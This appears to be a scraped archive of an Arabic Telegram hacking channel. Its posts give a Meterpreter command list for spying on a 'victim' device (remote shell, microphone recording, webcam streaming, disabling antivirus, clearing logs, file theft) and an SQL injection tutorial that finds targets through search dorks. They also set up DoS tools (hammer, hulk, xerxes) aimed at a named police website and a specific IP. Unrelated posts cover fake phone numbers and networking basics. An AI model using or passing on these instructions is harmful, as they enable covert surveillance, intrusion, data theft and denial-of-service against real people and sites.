☠ اكواد برمجية وهكرية ☠
🚭 السلام عليكم ورحمة الله وبركاته... قناة مختصة بأكواد برمجية وشروحات هكرية 🚭 كروب الهكر الخاص بنا👇👇 @Alsafa7en مشرفي القناة👇👇 @SkrteraAbles666bot @Back_Doors 🖥👇موقعي الرسمي لشروحات الهكر 👇🖥 www.hackerlmajhol.blogspot.com
Show moreThe country is not specifiedThe language is not specifiedThe category is not specified
1 873
Subscribers
No data24 hours
No data7 days
No data30 days
Posts Archive
تطبيق التيرمكس من متجر غوغل بلاي 👇👇
https://play.google.com/store/apps/details?id=com.termux
نزلكن شغلات ع تريمكس وع اختراق ومعلومات عن برنامجAnonymous voting
- Yes
- No
نسخه واتس ضد فايروس بدون دمج ولا ملف سرعا نسخه من اقوى نسخ ل فايروس
بعد شي 100 سنة رح نكون أموات والأعمار بيد الله
ورح يكون كل شي صار بهالحرب صفحتين او تلاتة بكتاب التاريخ..
ويكون عم يدرس فيه طالب عن التحالفات والأسماء والمعارك وكل هالقصص ..
يسكر كتابه ويروح لعند حبيبتو
وتسأله شو كنت عم تساوي !؟
يقلا كنت عم أدرس درس تاريخ غليييظ
تركينا منو ..
#اشتقتللك❤
بس لو يعرفوا هالدرس شو عمل فينا 💔.
#𝑹𝑨𝑮𝑯𝑨𝑫 𝑺𝑲𝑹𝑻𝑬𝑹𝑨 𝑨𝑩𝑳𝑬𝑺 ┋⁽❥̚͢₎ 🐣💗
#جديد_2020
برنامج تفعيل أرقام تركية وسعودية لتفعيل الواتس آب والتلجرام 😍🔥
• قنبلة الموسم 💣
• التطبيق يعطي أرقام ١٠٠%✅
☑️ للتحميل من هنا 👇
teqneia-sau.com/طريقة-عمل-رقم-سعودي-لتفعيل-الواتس-أب-تط/
أوامر التحكم والتجسس في جهاز الضحية:
--------------------------------------------
لأعادة تشغيل جهاز الضحية : reboot
------------------------------------------------------------
لاطفاء جهاز الضحية : shutdown
------------------------------------------------------------
لاضهار معلومات حول نضام الضحية مثل نضام تشغيل و لغة : sysinfo
------------------------------------------------------------
لألتقاط صورة من شاشة الضحية : screenshot
------------------------------------------------------------
لاضهار اتصلات الشبكة وجميع البرامج و الملفات المتصلة بالانترنت و مستهلكة للانترنت : netstat
------------------------------------------------------------
للدخول الي الملفات الداخليه و كتابة الاوامر كأنك في جهاز الضحية : shell
------------------------------------------------------------
لاقلاع اي برنامج علي جهاز الضحية بامر واحد منك : execute -f mc.apk
طبعا غير mc الي اسم البرنامج الذي تريده ان يشتغل
------------------------------------------------------------
لاضهار جميع البرامج التي تشتغل في جهاز الضحية اكتب : ps
------------------------------------------------------------
لرفع اي ملف من عندك الي جهاز الضحية : مثال : upload /sdcard/doda.apk \doda.apk
استبدل doda باسم الملف او التطبيق او اي شئ تريد رفعه
طبعا هذا بعد الدخول الي مكان التطبيق او الصوره او اي شئ وطبعا لدخول اللي ملفات الضحيه اطلب الامر
cd /sdcard
------------------------------------------------------------
لتحميل اي ملف او صورة ... من جهاز الضحية الي جهازك : download doda.apk
غير doda الي اسم الملف و ايضا صيغة apk الي صيغة الملف
طبعا هذا بعد الدخول الي مكان التطبيق او الصوره او اي شئ وطبعا لدخول اللي ملفات الضحيه اطلب الامر
cd /sdcard
------------------------------------------------------------
اوامر مهمه
اولا هذا الامر
بعد دخولك مباشر علي الضحيه cd /sdcard
sdcard : هذا مكان الذاكره الداخليه
اما اذا طلبت cd /sdcard1
sdcard1: هذا مكان الذاكره الخارجيه
اما معني cd
هذا الامر للتنقل بين الملفات : cd
يمكنك ان تكتب .. cd للرجوع الي الوراء
وايضا للدخول لملف cd file للذهاب و تنقل الي ملف اخر
قم باستبدال file ب اسم الملف الذي تريد ذهاب اليه
اما هذا الامر pwd هذا يبين لك اسم المكان الذي تتواجد به من البدايه للنهايه
مثال ...\...\...\...\...\
وايضا هذا الامر ls يظهر لك الملفات الموجودة و اين انت
وايضا Ctrl+l هذا لمسح الكلام الذي يتواجد في الشاشه
------------------------------------------------------------
هذا الامر لحذف اي ملف : rm doda
قم باستبدال doda الي الملف او برنامج او صورة الذي تريد ان تحذفها
------------------------------------------------------------
لاغلاق الجلسة الاختراق لفترة معينة من الزمن طبعا هذا مهم حتي لا يشك الضحية ... : sleep 5
غير 5 الي عدد التواني التي تحب فيها غلق جلسة الاختراق يمكنك وضع ساعة عن طريق كتابة 3600
3600 تانية = ساعة و هكذا
------------------------------------------------------------
لمسح سجل الاحدات و الاختراق (تفيد في الحماية) : clearev
------------------------------------------------------------
هذا الامر مفيد جدا دوره تعطيل جميع مضادات الفيروسات في جهاز الضحية : run killav.rb
------------------------------------------------------------
للتجسس علي مايك mic الخاص بالضحية و سماع كل ما يقوله الضحية و كل ما صوت في غرفته :
record_mic -d 5
غير 5 الي عدد الـتاوني الذي تريد تسجيل الصوت فيها متلا 60 يسجل كل ما يقوله الضحية لمدة دقيقة
طبعا الزمن بالتانية s
------------------------------------------------------------
لالتقاط صورة من كاميرا الجهاز : webcam_snap
------------------------------------------------------------
لمشاهدة كل ما يفعله الضحية من الكاميرا اي التجسس علي الكاميرا : webcam_stream -d 60
غير 60 الي عدد التواني التي تسجل فيه الكاميرا
يمكنك وضع 3600 حيت يسجل كل ما يفعله الضحية لمدة ساعة
و ايضا سيفتح صفحة في متصفحك لرؤية كل ما يفعله
--------------------------------------------------------------
معلومه مهمه اذا حملت اي شئ من عند الضحيه سيكون متواجد في ملف اداه metasploit الذي متواجد في termux ويمكنك نقل كل شئ قمت بتحميله من ملف metasploit الي الذاكره الداخليه الخاصه بك بهذا الامر
mv doda /sdcard
غير اسم doda باسم الملف او البرنامج او الصوره او اي شئ قمت بتحميله.
السلام عليكم ورحمة الله وبركاته الحمد لله وحده نحمده ونشكره ونستعين به ونستغفره وأشهد أن محمدا عبده ورسوله صلى الله عليه وسلم وعلى آله وصحبه أجمعين
شرح أداة SQLMap واستغلال ثغرة SQL Injection
شرح أداة SQLMap واستغلال ثغرة SQL Injection
كثيرا ما نتصفح المواقع ونجد بها أخطاء برمجية وبهذه الأخطاء يمكننا السيطرة الكاملة للموقع ولما لا السيرفر بحد ذاته مما يجعلنا نستطيع التحكم الكامل في المواقع المخزنة في نفس السيرفر
في هذه التدوينة أردت أن أشير إلى احدى هذه الثغرات وهي ثغرة SQL وهي خاصة بقاعدة البيانات للموقع بهذه الثغرة يمكنك سحب البيانات كالإيمايلات وأسماء المستخدمين المسجيلين بالموقع وما إلى ذلك حيث عند تصفحنا للمواقع نجد أخطاء في احد صفحات الموقع بهذا الشكل
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in/home/aeiti/public_html/admin/requires/functions.php on line 1327
أو
error Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/area96/area96.it/class/query/classQueries.php on line 38
فهي كثيرة ومن أجل الوصول إلى مثل هذه الصفحات يجب عليك الاعتماد على البحث المتقدم مثل محركات البحث Google أو Bing... المهم يكون محرك بحث قوي وأنا في الغالب يساعدني محرك البحث Bing
لفهم أكثر عن كيفية البحث في محرك جوجل إليك هذا الرابط انقر هنا
الأمر الثاني الصفحات التي أردتها أو تكون مصابة بمثل هذه الثغرة هي php وقد تكون أيضا بصيغة الـXSS
يعني في المحرك البحث Google نكتب
inurl:"news.php?nws="
inurl تعني البحث عن الصفحات التي تكون بهذا الشكل :
news.php?nws=
النتيجة تعطينا صفحات كثيرة قم بتجربتها لترى النتيجة فنجد المواقع بهذا الشكل
http://www.SITE.com/news.php?nws=16
نسيت أيضا أن انوه إلى أمر ما وهو أن "news.php?nws=" تعرف بالدورك Dork وهي كثيرة ولمعرفة إلى أنواعها سأعطيك رابط لتحميل جميع الدوركات انقر هنا1 و 2
كيف نعرف أن الصفحة مصابة بثغرة الـSQL
نضيف في أخر السطر ' لتصبح بهذ الشكل
http://www.SITE.com/news.php?nws=16'
إذا حدث تغيير على الصفحة عن طريق زيادة ' في أخر رابط الموقع نفهم أن الموقع مصاب بثغرة الـ SQL
كيفية سحب البيانات من الموقع
هناك أدوات كثيرة من أجل عمل سحب البيانات من أبرزها برنامج ال Havij
الذي يعمل على بيئة ويندوز وبالنواتين وقد قمت بعمل درس : طرق وكيفية إختراق المواقع والأدواث اللازمة خطوة خطوة
بحيث يعتمد على الأسلوب التقليدي لسحب البيانات من الموقع
أما في هذه المرة أردتها أن أجعلها مختلفة حيث استعملت فيها أداة قوية تعرف بـSQLMap بحيث يمكنك تحميلها من موقع GitHub ولزيارة الموقع الرسمي للأداة SQLMap بحيث يلزمك مترجم بايثون إذا كنت تعمل في بيئة ويندوز
هذه الأداة الغنية عن التعريف والمصنفة من العشر الأوائل الأكثر استخداما وقوة في توزيعة كالي لينكس توزيعة الحماية والإختراق
للوصول إلى سحب البيانات أو الـ DATA وابتداءا من الموقع المصاب يجب أولا معرفة الـDATA BASES ثم الـTables ثم الأعمدة أو Columns وصولا إلى البيانات أو الـData
#Back_Doors
كورس شبكات مهم جدا للاشخاص الذين يريدون الدخول في عالم السكيوريتي 👆👆
Show all...
رابط تحميل تطبيق التيرمكس في المتجر اخر اصدار 👇👇
https://play.google.com/store/apps/details?id=com.termux
@Back_Doors ☠
أداة ip geolocation هي اداة مهمة نحتاجها في سحب معلومات عن الموقع ..
ومعرفة الاي بي الخاص بالموقع اذا كنا نريد استهدافه:
1/لتحميل الاداه نقوم بكتابه الامر
git clone https://github.com/maldevel/IPGeoLoca...
2/بعد التثبيت تقوم بكتابه امر (cd)
(ls)
(cd IPGeoLocation)
(ls)
لتفعيلها:
(chmod +x ipgeolocation.py)
(cd)
(ls)
(pip install -r requirements.txt)
وللتشغيل:
(python2 ipgeolocation.py)
11/تم التشغيل.......................................................................
لاضهار الip الخاص بجهازك نكتب امر
python ipgeolocation.py -m
لاضهار ip موقع نكتب الامر
python ipgeolocation.py -t +اسم الموقع
لمعرفه معلومات المتصلين بلشبكه معك تكتب امر:
netstat -n
لمعرفه معلومات المتصل معك علئ الشبكه تأخذ الipالخاص به و تكتب الامر
python ipgeolocation.py -t+ الايبي المتصل معك
@Back_Doors ☠
الأداه hammer لضرب المواقع
apt update && apt upgrade
apt install python3
apt install git
git clone https://github.com/cyweb/hammer
cd hammer
chmod +x hammer.py
ls
python3 hammer.py -s http://www.police.gov.il/
الاداة hulk للهجوم علي المواقع 👇👇
git clone https://github.com/grafov/hulk.git
الاوامر👇👇
python hulk.py
python2 hulk.py
https://github.com/zanyarjamal/xerxes اداة
لعمل دووس اتاك 👇👇❗️❗️
cd xerxes
ls
chmod +x xerxes.c
ls
gcc xerxes.c -o xerxes
./xerxes 82.166.143.86 805
@Back_Doors ☠
السلام عليكم ورحمة الله وبركاته
اختاروا شو الشروحات لي بتحبوهاAnonymous voting
- شروحات تيرمكس
- ارقام اجنبية
- شروحات شبكات
- تطبيقات مدفوعة
de facto(by fact)standards:
وهي المواصفات التي تم تصميمها
من قبل مؤسسات تجاريه وتنقسم الى :
1- أنظمه مفتوحه.
2- وانظمه مغلقه.
الانظمه المغلقه :
يكون المستخدمين مجبرين على استخدام اجهزه من منتج او شركه واحدة فقط
ولا تستطيع انظمتهم التعامل مع اجهزه من مصنعين اخرين (وكان ذلك شائعافي
السبعينات والثمانينات).
الانظمه المفتوحه :
مع تطور صناعة الكمبيوتر وانتشارها كان لابد من
ايجاد مقاييس تسمح للاجهزه بأختلاف مصنعيها بالتفاهم
في مابينها( اذن تسمح للمستخدمين بأستخدام اجهز من شركات ومنتجات عديده.
de jure(by law)standards:
وهي المواصفات التي تم تصميمها من قبل مؤسسات رسميه معروفه
((basic concepts))
line configuration
1- multipoint
جهازين فقط متصلان بواسطة خط الاتصال.
2- point-to-point
ثلاثه اجهزه واكثر تشترك في خط الاتصال .
what is networking?
ماهي الشبكات ؟
هي مجموعة من اجهزة الحاسب وبعض الاجهزه
الاخرى مرتبطه مع بعضها البعض للمشاركة في الموارد.
network protocols
بروتوكول قواعد الاتصال هي وسيله تبادل المعلومات في الشبكة
وهي قواعد تنظيميه تحتاجها الشبكة لكي تساعد عناصرها المختلفه
على الاتصال وفهم بعضها البعض.
standards:
هي عباره عن مواصفات للمنتج تسمح له بالعمل
بغض النظر عن المصنع الذي انتجه،
وتنقسم الى نوعين:
1- de facto
2- de jure